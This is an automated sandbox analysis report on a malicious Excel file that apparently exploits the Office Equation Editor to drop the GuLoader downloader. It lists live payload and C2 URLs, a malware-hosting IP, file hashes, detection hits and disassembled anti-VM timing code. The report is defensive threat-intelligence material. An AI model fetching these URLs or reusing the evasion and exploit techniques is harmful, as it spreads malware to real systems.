Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmp	Binary or memory string: !Progman

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.155.82.236	unknown	unknown		134687	TWIDC-AS-APTWIDCLimitedHK	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://103.155.82.236/fksdoc/svchost.exe	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co	true	Avira URL Cloud: safe	unknown

AV Detection:

Antivirus detection for URL or domain

Source: http://103.155.82.236/fksdoc/svchost.exe

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co"}

Multi AV Scanner detection for domain / URL

Source: http://103.155.82.236/fksdoc/svchost.exe

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	Metadefender: Detection: 28%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	ReversingLabs: Detection: 58%
Source: C:\Users\Public\vbc.exe	Metadefender: Detection: 28%	Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 58%

Multi AV Scanner detection for submitted file

Source: BL_SGN11203184.xlsx

ReversingLabs: Detection: 21%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)

Source: excel.exe

Memory has grown: Private usage: 4MB later: 46MB

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 103.155.82.236:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co

Downloads executable code via HTTP

Source: global traffic

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F77229A3.emf

Jump to behavior

Source: global traffic

Source: F77229A3.emf.0.dr

String found in binary or memory: http://www.day.com/dam/1.0

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446A2E NtAllocateVirtualMemory,	4_2_00446A2E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446A78 NtAllocateVirtualMemory,	4_2_00446A78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446C20 NtAllocateVirtualMemory,	4_2_00446C20
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446AF8 NtAllocateVirtualMemory,	4_2_00446AF8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446B94 NtAllocateVirtualMemory,	4_2_00446B94

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00401C10	4_2_00401C10
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004055F3	4_2_004055F3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446A2E	4_2_00446A2E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00444440	4_2_00444440
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044185A	4_2_0044185A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044666C	4_2_0044666C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446A78	4_2_00446A78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044B409	4_2_0044B409
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044341C	4_2_0044341C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446629	4_2_00446629
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443834	4_2_00443834
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443A30	4_2_00443A30
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443238	4_2_00443238
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004434C0	4_2_004434C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004436DE	4_2_004436DE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00446AF8	4_2_00446AF8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00444490	4_2_00444490
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004432A0	4_2_004432A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443AA0	4_2_00443AA0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004466B8	4_2_004466B8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044350C	4_2_0044350C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044450C	4_2_0044450C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443714	4_2_00443714
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044331C	4_2_0044331C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443925	4_2_00443925
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443B30	4_2_00443B30
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044173C	4_2_0044173C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004439DC	4_2_004439DC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004431D8	4_2_004431D8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004447ED	4_2_004447ED
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004443FB	4_2_004443FB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00443788	4_2_00443788
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00444993	4_2_00444993
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004433A4	4_2_004433A4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004417B8	4_2_004417B8

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: BL_SGN11203184.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

PE file contains strange resources

Source: svchost[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/16@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$BL_SGN11203184.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRF085.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: BL_SGN11203184.xlsx

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: BL_SGN11203184.xlsx

Static file information: File size 1317888 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: BL_SGN11203184.xlsx

Initial sample: OLE indicators vbamacros = False

Source: BL_SGN11203184.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, type: MEMORY

Yara detected GuLoader

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000000.2151758048.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, type: DROPPED
Source: Yara match	File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00409C54 push es; iretd	4_2_00409C5E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040605F push 00000059h; retf	4_2_00406061
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406E64 push eax; retf	4_2_00406E65
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040A065 pushad ; retf	4_2_0040A0B8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00409E0D push edx; iretd	4_2_00409E12
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00409EF8 push ss; iretd	4_2_00409EFE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406AFE push es; iretd	4_2_00406B02
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004079CA push cs; iretd	4_2_004079CE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00409387 push ss; iretd	4_2_004093A6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00408D90 push cs; iretd	4_2_00408D9E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00403191 push dword ptr [ebp-44h]; ret	4_2_0041ECA4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00445356 push edi; iretd	4_2_00445357

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: BL_SGN11203184.xlsx

Stream path 'EncryptedPackage' entropy: 7.99983573817 (max. 8.0)

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000449F94 second address: 000000000044A040 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub esp, 00000100h 0x00000010 mov edi, esp 0x00000012 test cx, dx 0x00000015 add esp, 00000100h 0x0000001b test eax, eax 0x0000001d mov dword ptr [edi+28h], eax 0x00000020 test bx, dx 0x00000023 mov esi, BEC25DA1h 0x00000028 add esi, 4F1D403Dh 0x0000002e xor esi, E8F819C0h 0x00000034 add esi, 1AD96BE2h 0x0000003a jmp 00007F0994A9E00Eh 0x0000003c pushad 0x0000003d mov eax, 0000003Fh 0x00000042 cpuid 0x00000044 popad 0x00000045 add esi, 00001000h 0x0000004b cmp esi, 0000F000h 0x00000051 je 00007F0994A9E520h 0x00000057 cmp esi, 7FFFF000h 0x0000005d je 00007F0994A9E514h 0x00000063 push 0AF1A7F6h 0x00000068 xor dword ptr [esp], 7FA34B79h 0x0000006f pushad 0x00000070 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000044A040 second address: 000000000044A040 instructions:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000449F94 second address: 000000000044A040 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub esp, 00000100h 0x00000010 mov edi, esp 0x00000012 test cx, dx 0x00000015 add esp, 00000100h 0x0000001b test eax, eax 0x0000001d mov dword ptr [edi+28h], eax 0x00000020 test bx, dx 0x00000023 mov esi, BEC25DA1h 0x00000028 add esi, 4F1D403Dh 0x0000002e xor esi, E8F819C0h 0x00000034 add esi, 1AD96BE2h 0x0000003a jmp 00007F0994A9E00Eh 0x0000003c pushad 0x0000003d mov eax, 0000003Fh 0x00000042 cpuid 0x00000044 popad 0x00000045 add esi, 00001000h 0x0000004b cmp esi, 0000F000h 0x00000051 je 00007F0994A9E520h 0x00000057 cmp esi, 7FFFF000h 0x0000005d je 00007F0994A9E514h 0x00000063 push 0AF1A7F6h 0x00000068 xor dword ptr [esp], 7FA34B79h 0x0000006f pushad 0x00000070 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000044A040 second address: 000000000044A040 instructions:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00446454 rdtsc

4_2_00446454

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2336

Thread sleep time: -300000s >= -30000s

Jump to behavior

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00446454 rdtsc

4_2_00446454

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00444440 mov eax, dword ptr fs:[00000030h]	4_2_00444440
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004436DE mov eax, dword ptr fs:[00000030h]	4_2_004436DE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004490F5 mov eax, dword ptr fs:[00000030h]	4_2_004490F5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004464F9 mov eax, dword ptr fs:[00000030h]	4_2_004464F9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044993D mov eax, dword ptr fs:[00000030h]	4_2_0044993D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004443FB mov eax, dword ptr fs:[00000030h]	4_2_004443FB

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmp	Binary or memory string: !Progman

ID:	432590
Product:	CloudBasic
Start time:	15:16:10
Start date:	10.06.2021
Sample:	BL_SGN11203184.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	06eb9a2b3d7113604968b87722ed242a
SHA1:	2a6929b76b8b69a4e3a3766881280c63af765cb1
SHA256:	1554d0f1b36381c9a323749cd62b7870c8273d8020fc81df09cb159a3bb84acc
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	99BBF83ABE9D6E4ECC91493E32230833	B0BD6BA2DC10EB5552EDC7A3460C80EE0EB1B11E	2B2A00650DC91D1A7CCFA4A62E3462762C62D8A092BDDB75943F87074F1D56A5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E4E0F48.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\21A36D14.png	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced	16925690E9B366EA60B610F517789AF1	9F3FE15AE44644F9ED8C2CA668B7020DF726426B	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\221576A9.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5AE1779F.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79B68205.png	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced	8C29CF033A1357A8DE6BF1FC4D0B2354	85B228BBC80DC60D40F4D3473E10B742E7B9039E	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A9F521.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E0CA1A0.png	PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced	4141C7515CE64FED13BE6D2BA33299AA	B290F533537A734B7030CE1269AC8C5398754194	F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\988F9842.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B8598AE.png	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced	16925690E9B366EA60B610F517789AF1	9F3FE15AE44644F9ED8C2CA668B7020DF726426B	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B99C14D7.png	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced	8C29CF033A1357A8DE6BF1FC4D0B2354	85B228BBC80DC60D40F4D3473E10B742E7B9039E	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
